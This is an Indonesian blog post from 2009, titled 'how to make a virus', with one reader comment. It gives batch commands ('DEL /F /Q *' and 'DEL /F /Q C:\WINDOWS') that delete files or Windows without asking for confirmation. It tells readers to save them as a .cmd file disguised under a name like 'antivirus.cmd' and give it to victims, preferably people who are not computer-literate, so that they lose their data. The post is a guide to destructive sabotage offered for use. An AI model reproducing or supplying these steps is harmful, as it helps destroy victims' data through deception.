Minggu, 19 Juli 2009

Cara Nggawe Virus

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.

PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:


Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

Comments :

1
shannaroo92 mengatakan...
on 

edaaaan edaaaaaan

Posting Komentar

Blog Archive

 

Copyright © 2009 by ¤ëXcêL™¤ ßlõg